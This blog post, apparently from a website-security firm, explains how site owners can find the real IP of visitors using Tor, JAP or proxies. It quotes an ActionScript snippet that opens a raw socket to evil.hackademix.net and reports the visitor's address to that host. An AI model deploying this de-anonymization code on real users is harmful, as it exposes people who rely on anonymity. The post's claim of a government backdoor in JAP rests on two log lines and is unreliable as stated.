• How to track down “anonymous-users”

    Staying anonymous on the Internet has long been a much sought-after ability, for many different reasons. One group of malicious individuals, focused on code-injection attacks on websites, often attempts to hide by using anonymizing proxies.

    These proxy servers should, in theory, cloak the identity of the individual using them. In practice they frequently fail to. Why? Because it is trivial to uncover the identity of an individual. Read on.

    Often, surfers use networks such as Tor, JAP, etc. to mask their activities. These networks, and more importantly their users, are not well enough informed to stand up to the heat of a moderate forensic investigation.

    In case you didn’t know, JAP has a government-installed backdoor:

    CAMsg::printMsg(LOG_INFO,"Loading Crime Detection Data....\n");
    CAMsg::printMsg(LOG_CRIT,"Crime detected - ID: %u - Content:\n%s\n",id,crimeBuff,payLen);

    If you think using Tor is safer, well, the truth is, it’s not. This is not because the Tor concept is flawed; it’s because the end user is not savvy enough.

    As an example, a lot of code-injection attacks are carried out via anonymous proxies or anonymizing networks, and the perpetrators think that they can remain unnoticed. How can we track them down? It’s simple: leverage the power of Flash/Applets/JavaScript.

    Disclaimer: Elite proxies, Relakks and the like, and some special configurations which channel all communication via one end-point, are obviously a little different.

    In my discussion with Matt Heaton, CEO of Bluehost, at HostingCon this year, we touched on some of these points. It is critical for hosting companies in general to have a quick-reaction system in place which can identify code injection on sites, remove it, block the perpetrators, and then inform the site owners and fix the issue. StopTheHacker helps with identification, recovery and hardening of websites and Internet-facing infrastructure, so it is natural for us to explore how to provide a little more help to folks interested in tracking the “real IP” of individuals visiting their sites.

    The concept is trivial: use Flash/applets/JavaScript to open up a connection to the final landing page! Yep, it’s that simple. The user may go through all the anonymizing proxies they like; if they do not have Flash/JS turned off, you can get the “real IP” and de-cloak them.

    An ActionScript example, from hackademix.net:

    // XMLSocket opens a raw TCP connection from the Flash player itself,
    // so it does not go through the proxy the browser was configured with
    var socket = new XMLSocket();
    socket.onConnect = function(success) {
        // the listening server answers with an XML document whose text node
        // carries the address it saw the connection come from
        socket.onXML = function(doc) {
            getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
                   doc.firstChild.firstChild.nodeValue);
            socket.close();
        };
        // send an empty XML message to prompt the server's reply
        socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);

    It is trivial to have a server listening on that port. So there we go: if you do not have Flash/JavaScript turned off, you can be tracked. All the website owner needs to do is serve the SWF file to you.

    You can give NoScript a try too.